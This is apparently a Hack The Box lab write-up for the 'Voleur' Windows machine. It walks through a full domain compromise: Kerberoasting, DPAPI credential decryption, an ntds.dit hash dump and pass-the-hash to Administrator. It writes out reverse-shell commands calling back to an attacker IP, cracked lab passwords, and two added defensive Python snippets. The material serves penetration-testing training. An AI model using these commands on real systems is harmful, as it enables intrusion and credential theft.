Hack The Box / WINDOWS / 2026-03-18
Hack The Box — Voleur (Windows)
Kerberos-first Active Directory compromise from provided credentials, multi-user pivots with DPAPI credential extraction, Linux backup abuse, and final Administrator access.
Target
- IP: 10.129.90.146
Machine information
As is common in real-life Windows penetration tests, you start the Voleur box with credentials for the following account:
ryan.naylor / HollowOct31Nyt
Recon
sudo nmap -sC -sV 10.129.90.146 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-06 04:31:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
52456/tcp open msrpc Microsoft Windows RPC
58889/tcp open msrpc Microsoft Windows RPC
58903/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
nxc smb 10.129.90.146 -u ryan.naylor -p HollowOct31Nyt --shares
SMB 10.129.90.146 445 10.129.90.146 [*] x64 (name:10.129.90.146) (domain:10.129.90.146) (signing:True) (SMBv1:False)
SMB 10.129.90.146 445 10.129.90.146 [-] 10.129.90.146\ryan.naylor:HollowOct31Nyt STATUS_NOT_SUPPORTED
nxc ldap 10.129.90.146 -u ryan.naylor -p HollowOct31Nyt
LDAP 10.129.90.146 389 DC.voleur.htb [*] x64 (name:DC.voleur.htb) (domain:voleur.htb) (signing:True) (SMBv1:False)
LDAP 10.129.90.146 389 DC.voleur.htb [-] voleur.htb\ryan.naylor:HollowOct31Nyt STATUS_NOT_SUPPORTED
Both attempts fail with STATUS_NOT_SUPPORTED: NTLM authentication is disabled on this domain, so everything has to go through Kerberos. Add dc.voleur.htb and voleur.htb to /etc/hosts and sync the clock with the DC (Kerberos tolerates only a few minutes of skew):
sudo ntpdate dc.voleur.htb
Kerberos setup and domain enumeration
getTGT.py 'voleur.htb'/'ryan.naylor':'HollowOct31Nyt' -dc-ip 10.129.90.146
[*] Saving ticket in ryan.naylor.ccache
export KRB5CCNAME='ryan.naylor.ccache'
nxc ldap dc.voleur.htb -d voleur.htb -k --use-kcache
LDAP dc.voleur.htb 389 DC.voleur.htb [*] x64 (name:DC.voleur.htb) (domain:voleur.htb) (signing:True) (SMBv1:False)
LDAP dc.voleur.htb 389 DC.voleur.htb [+] voleur.htb\ryan.naylor from ccache
Collect domain information with BloodHound:
bloodhound-python -u ryan.naylor -k -no-pass -ns 10.129.90.146 -d voleur.htb -dc dc.voleur.htb -c All --zip
We get a zip archive.
sudo bloodhound
Upload the zip in BloodHound.
nxc smb dc.voleur.htb -d voleur.htb -k --use-kcache --shares
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ryan.naylor from ccache
SMB dc.voleur.htb 445 dc [*] Enumerated shares
SMB dc.voleur.htb 445 dc Share Permissions Remark
SMB dc.voleur.htb 445 dc ----- ----------- ------
SMB dc.voleur.htb 445 dc ADMIN$ Remote Admin
SMB dc.voleur.htb 445 dc C$ Default share
SMB dc.voleur.htb 445 dc Finance
SMB dc.voleur.htb 445 dc HR
SMB dc.voleur.htb 445 dc IPC$ READ Remote IPC
SMB dc.voleur.htb 445 dc IT READ
SMB dc.voleur.htb 445 dc NETLOGON READ Logon server share
SMB dc.voleur.htb 445 dc SYSVOL READ Logon server share
Check the IT share.
Update /etc/krb5.conf and add:
[realms]
VOLEUR.HTB = {
kdc = dc.voleur.htb
admin_server = dc.voleur.htb
}
[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB
Run:
smbclient -U ryan.naylor@VOLEUR.HTB --use-kerberos=required //dc.voleur.htb/IT
Enter password HollowOct31Nyt.
smb: \> ls
. D 0 Wed Jan 29 09:10:01 2025
.. DHS 0 Mon Jun 30 21:08:33 2025
First-Line Support D 0 Wed Jan 29 09:40:17 2025
5311743 blocks of size 4096. 895002 blocks available
smb: \> cd "First-Line Support"
smb: \First-Line Support\> ls
. D 0 Wed Jan 29 09:40:17 2025
.. D 0 Wed Jan 29 09:10:01 2025
Access_Review.xlsx A 16896 Thu Jan 30 14:14:25 2025
5311743 blocks of size 4096. 895000 blocks available
smb: \First-Line Support\> get Access_Review.xlsx
getting file \First-Line Support\Access_Review.xlsx of size 16896 as Access_Review.xlsx (434.2 KiloBytes/sec) (average 434.2 KiloBytes/sec)
The file is password-protected.
office2john ./Access_Review.xlsx
Access_Review.xlsx:$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c
Put it in a file called hash.
To use John the Ripper with GPU:
./john/run/john --wordlist=rockyou.txt --format=office-opencl ./hash
We find password football1.
Open the Excel file with LibreOffice Calc. It contains:
User | Job Title | Permissions | Notes
Ryan.Naylor | First-Line Support Technician | SMB | Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant | First-Line Support Technician | SMB |
Lacey.Miller | Second-Line Support Technician | Remote Management Users |
Todd.Wolfe | Second-Line Support Technician | Remote Management Users | Leaver. Password was reset to NightT1meP1dg3on14 and account deleted.
Jeremy.Combs | Third-Line Support Technician | Remote Management Users | Has access to Software folder.
Administrator | Administrator | Domain Admin | Not to be used for daily tasks!
Service Accounts
svc_backup | Windows Backup | Speak to Jeremy!
svc_ldap | LDAP Services | P/W - M1XyC9pW7qT5Vn
svc_iis | IIS Administration | P/W - N5pXyW1VqM7CZ8
svc_winrm | Remote Management | Need to ask Lacey as she reset this recently.
From BloodHound we notice:
- svc_ldap is part of restore_users, which has a GenericWrite relation toward user lacey.miller
- svc_ldap has a WriteSPN relation toward user svc_winrm
getTGT.py 'voleur.htb'/'svc_ldap':'M1XyC9pW7qT5Vn' -dc-ip 10.129.90.146
[*] Saving ticket in svc_ldap.ccache
Attempt 1 (did not work): pywhisker
Download pywhisker:
git clone https://github.com/ShutdownRepo/pywhisker.git
python3 pywhisker/pywhisker/pywhisker.py -vv -d 'voleur.htb' --dc-ip 10.129.90.146 --dc-host dc.voleur.htb -d voleur.htb -u svc_ldap -k --no-pass --target lacey.miller --action add
[+] Saved PFX (#PKCS12) certificate & key at path: NxjKvYza.pfx
[*] Must be used with password: W545qLO9Jl0LpDpEXtr7
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
[VERBOSE] Run the following command to obtain a TGT
[VERBOSE] python3 PKINITtools/gettgtpkinit.py -cert-pfx NxjKvYza.pfx -pfx-pass W545qLO9Jl0LpDpEXtr7 voleur.htb/lacey.miller NxjKvYza.ccache
certipy cert -export -pfx NxjKvYza.pfx -password W545qLO9Jl0LpDpEXtr7 -out "lacey_miller.pfx"
[*] Data written to 'lacey_miller.pfx'
certipy auth -dc-ip 10.129.90.146 -pfx lacey_miller.pfx -username lacey.miller -domain voleur.htb
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
This path does not work: KDC_ERR_PADATA_TYPE_NOSUPP means the KDC does not accept PKINIT pre-authentication, so the certificate added through shadow credentials cannot be turned into a TGT here.
Kerberoast path to svc_winrm
Download targetedKerberoast:
- https://github.com/ShutdownRepo/targetedKerberoast
python3 targetedKerberoast/targetedKerberoast.py -v --dc-ip 10.129.90.146 --dc-host dc.voleur.htb -d voleur.htb -u svc_ldap -k --no-pass
Using the GenericWrite/WriteSPN rights of svc_ldap, the tool sets a temporary SPN on each writable account, requests a service ticket for it and removes the SPN again. We get hashes for lacey.miller and svc_winrm.
Put them in a file called hash.
./hashcat-6.2.6/hashcat.bin -a 0 ./hash ./rockyou.txt
We crack svc_winrm password:
AFireInsidedeOzarctica980219afi
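The Kerberoast step above leaves a clear trace on the DC: each ticket request for the temporarily SPN'd accounts is a 4769 event, and because the hash is cracked offline the ticket is requested with RC4 (encryption type 0x17) rather than AES. The following Python is an added, defender-side example (not part of the original writeup or of targetedKerberoast) that flags that pattern; the key=value record format and the sample lines are constructed for the example.

```python
"""Flag Kerberoast-style TGS requests in Windows 4769 security events.

Added example for the Voleur writeup, not part of the original page.
The records below are constructed samples in a simplified key=value form;
real 4769 events carry the same fields in EVTX/XML.
Encryption type 0x17 is RC4-HMAC; 0x12 is AES256-CTS-HMAC-SHA1-96.
"""
import re
from collections import defaultdict

# Constructed sample records (not real logs from the target).
SAMPLE_LOG = """
EventID=4769 TargetUserName=ryan.naylor@VOLEUR.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=10.10.15.37
EventID=4769 TargetUserName=svc_ldap@VOLEUR.HTB ServiceName=svc_winrm TicketEncryptionType=0x17 IpAddress=10.10.15.37
EventID=4769 TargetUserName=svc_ldap@VOLEUR.HTB ServiceName=lacey.miller TicketEncryptionType=0x17 IpAddress=10.10.15.37
EventID=4769 TargetUserName=svc_ldap@VOLEUR.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.15.37
EventID=4768 TargetUserName=svc_ldap@VOLEUR.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.15.37
"""

RC4_HMAC = 0x17
FIELD_RE = re.compile(r"(\w+)=(\S+)")
# krbtgt and machine accounts (names ending in $) are not Kerberoast targets.
IGNORED_SERVICES = {"krbtgt"}

def parse_records(text):
    """Turn each non-empty line into a dict of field -> value."""
    return [dict(FIELD_RE.findall(line)) for line in text.splitlines() if line.strip()]

def rc4_tgs_requests(records):
    """Return 4769 events that asked for an RC4 ticket to a user service account."""
    hits = []
    for r in records:
        if r.get("EventID") != "4769":
            continue
        svc = r.get("ServiceName", "")
        if svc in IGNORED_SERVICES or svc.endswith("$"):
            continue
        if int(r.get("TicketEncryptionType", "0"), 16) == RC4_HMAC:
            hits.append(r)
    return hits

def requesters_by_service(records):
    """Map requesting account -> sorted services it obtained RC4 tickets for.
    One account hitting several user SPNs in a row is the Kerberoast pattern."""
    out = defaultdict(set)
    for r in rc4_tgs_requests(records):
        out[r["TargetUserName"]].add(r["ServiceName"])
    return {k: sorted(v) for k, v in out.items()}
```

Running `requesters_by_service(parse_records(SAMPLE_LOG))` on the sample shows only svc_ldap, with both SPN'd accounts, which is the alert a SOC would raise for this step.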
getTGT.py 'voleur.htb'/'svc_winrm':'AFireInsidedeOzarctica980219afi' -dc-ip 10.129.90.146
[*] Saving ticket in svc_winrm.ccache
export KRB5CCNAME='svc_winrm.ccache'
evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
We get a PowerShell shell as svc_winrm and can grab the user flag from the desktop.
The shell is not very stable and sometimes crashes, so we switch to a more stable shell.
Upload nc64.exe to the target machine:
- https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
On attacker machine:
rlwrap nc -vlnp 4444
On target machine:
.\nc64.exe -e cmd.exe 10.10.15.37 4444
We get a reverse shell.
Pivot to svc_ldap and restore deleted user
We can also get a reverse shell as svc_ldap.
Start listener:
rlwrap nc -vlnp 4444
Download RunasCs and upload it to the victim:
- https://github.com/antonioCoco/RunasCs
.\RunasCs.exe 'svc_ldap' 'M1XyC9pW7qT5Vn' "C:\tmp\nc64.exe -e cmd.exe 10.10.15.37 4444"
We get a reverse shell as svc_ldap.
Get PowerShell:
powershell
Upload PowerView.ps1 to the victim machine:
- https://github.com/PowerShellMafia/PowerSploit/raw/master/Recon/PowerView.ps1
. .\PowerView.ps1
Get-DomainObject -Tombstone -LDAPFilter '(isDeleted=TRUE)'
There is todd.wolfe, with distinguished name:
CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb
Restore-ADObject -Identity 'CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb'
We restored todd.wolfe.
Start listener:
rlwrap nc -vlnp 4444
On target machine:
.\RunasCs.exe 'todd.wolfe' 'NightT1meP1dg3on14' "C:\tmp\nc64.exe -e cmd.exe 10.10.15.37 4444"
We get a reverse shell as todd.wolfe.
Get PowerShell:
powershell
The Excel file says todd.wolfe is a Second-Line Support Technician.
cd 'C:\IT\Second-Line Support'
There is an Archived Users folder.
cd 'Archived Users\todd.wolfe'
ls
This is his home directory.
cd 'C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials'
ls
There is one credential file: 772275FAD58525253490A9B0039791D3.
The master key is in:
C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\<sid>\<guid>
where <sid> is the SID of the profile's owner (todd.wolfe here) and <guid> is the master key GUID.
Indeed there is a file at:
C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88
whoami /all
We see that todd.wolfe's SID is S-1-5-21-3927696377-1337352550-2781715495-1110, matching the folder name.
certutil -encode 'C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110\08949382-134f-4c63-b93c-ce52efc0aa88' C:\tmp\masterkey_encoded.txt
type C:\tmp\masterkey_encoded.txt
Copy the base64 content into a file roba.b64 on the attacker machine.
base64 -d roba.b64 > masterkey
dpapi.py masterkey -file masterkey -sid 'S-1-5-21-3927696377-1337352550-2781715495-1110' -password 'NightT1meP1dg3on14'
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
On target machine:
certutil -encode 'C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3' C:\tmp\cred_encoded.txt
type C:\tmp\cred_encoded.txt
Copy the base64 content into roba.b64.
base64 -d roba.b64 > cred
dpapi.py credential -file cred -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m
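Above, the credential blob was matched to its master key by hand, via the GUID-named file under Protect\<sid>\. For forensic triage of an archived profile it is useful to read that GUID from the blob itself: every DPAPI blob carries the GUID of the master key that protects it in its header, and a Credentials file is just a small wrapper around such a blob. The following Python is an added example, not from the writeup or from impacket; it assumes the header layouts that dpapi.py parses (12-byte credential-file wrapper, then version, provider GUID, master-key version, master-key GUID) and builds a constructed sample file with the GUID from the page.

```python
"""Read the master-key GUID out of a DPAPI blob / Credentials file header.

Added example for the Voleur writeup; not from the page or from impacket.
Assumed layout (as dpapi.py parses it): a Credentials file is a 12-byte
header (version, blob size, unknown) followed by a DPAPI_BLOB; the blob
starts with a version, the DPAPI provider GUID, a master-key version and
the GUID of the master key that protects it.
"""
import ntpath
import struct
import uuid

DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

def parse_dpapi_blob_header(blob):
    """Return version, master-key version and master-key GUID from a DPAPI blob."""
    if len(blob) < 40:
        raise ValueError("too short to be a DPAPI blob")
    version, = struct.unpack_from("<L", blob, 0)
    provider = uuid.UUID(bytes_le=blob[4:20])
    mk_version, = struct.unpack_from("<L", blob, 20)
    mk_guid = uuid.UUID(bytes_le=blob[24:40])
    if provider != DPAPI_PROVIDER_GUID:
        raise ValueError(f"unexpected provider GUID {provider}")
    return {"version": version, "masterkey_version": mk_version, "masterkey_guid": str(mk_guid)}

def parse_credential_file(data):
    """Strip the Credentials-file wrapper, then parse the embedded blob header."""
    version, size, _unknown = struct.unpack_from("<LLL", data, 0)
    blob = data[12:12 + size]
    if len(blob) != size:
        raise ValueError("credential file truncated")
    info = parse_dpapi_blob_header(blob)
    info["file_version"] = version
    return info

def masterkey_path(profile_root, sid, masterkey_guid):
    """Expected master-key file location under an (archived) user profile."""
    return ntpath.join(profile_root, "AppData", "Roaming", "Microsoft", "Protect", sid, masterkey_guid)

def build_sample_credential_file(masterkey_guid):
    """Constructed sample: wrapper + blob header, remainder zeroed (holds no secret)."""
    blob = struct.pack("<L", 1) + DPAPI_PROVIDER_GUID.bytes_le
    blob += struct.pack("<L", 1) + uuid.UUID(masterkey_guid).bytes_le
    blob += b"\x00" * 32  # flags, description length, algorithm ids: unused here
    return struct.pack("<LLL", 1, len(blob), 0) + blob

if __name__ == "__main__":
    info = parse_credential_file(build_sample_credential_file("08949382-134f-4c63-b93c-ce52efc0aa88"))
    print(info, masterkey_path(r"C:\IT\Second-Line Support\Archived Users\todd.wolfe", "S-1-5-21-3927696377-1337352550-2781715495-1110", info["masterkey_guid"]))
```

On a real Credentials file the same call tells you which master key file you need before any decryption is attempted, which is also the check to run when a blob refuses to decrypt with the key you picked.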
Pivot to jeremy.combs and Linux side access
Start netcat listener:
rlwrap nc -vlnp 4444
On target machine:
.\RunasCs.exe 'jeremy.combs' 'qT3V9pLXyN7W4m' "C:\tmp\nc64.exe -e cmd.exe 10.10.15.37 4444"
We get a reverse shell as jeremy.combs.
Get PowerShell:
powershell
The Excel file says jeremy.combs is a Third-Line Support Technician.
cd C:\IT
cd 'Third-Line Support'
ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/30/2025 8:11 AM Backups
-a---- 1/30/2025 8:10 AM 2602 id_rsa
-a---- 1/30/2025 8:07 AM 186 Note.txt.txt
type Note.txt.txt
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin
We cannot access the Backups folder.
Copy id_rsa to the attacker machine.
chmod 600 id_rsa
ssh-keygen -y -f id_rsa > id_rsa.pub
cat id_rsa.pub
The key comment shows the user is svc_backup.
ssh -p 2222 svc_backup@dc.voleur.htb -i id_rsa
We get a shell on the Linux system.
sudo -l
Matching Defaults entries for svc_backup on DC:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User svc_backup may run the following commands on DC:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
sudo -i
We become root.
The Windows host filesystem is mounted at /mnt/c, so root on the WSL side can read the Backups folder that jeremy.combs could not open.
cd '/mnt/c/IT/Third-Line Support/backups'
ls -la
total 0
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 08:11 .
dr-xr-xr-x 1 svc_backup svc_backup 4096 Jan 30 08:11 ..
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49 'Active Directory'
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 03:49 registry
scp -P 2222 -i id_rsa -r svc_backup@dc.voleur.htb:'/mnt/c/IT/Third-Line Support/backups' .
On attacker machine:
cd backups
tree
.
├── Active Directory
│ ├── ntds.dit
│ └── ntds.jfm
└── registry
├── SECURITY
└── SYSTEM
secretsdump.py -system registry/SYSTEM -ntds ./Active\ Directory/ntds.dit LOCAL
Among the hashes, we find Administrator:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
getTGT.py 'voleur.htb'/'Administrator' -hashes ':e656e07c56d831611b577b160b259ad2' -dc-ip 10.129.90.146
[*] Saving ticket in Administrator.ccache
export KRB5CCNAME='Administrator.ccache'
evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
We get a PowerShell shell as Administrator and can read the root flag from the desktop.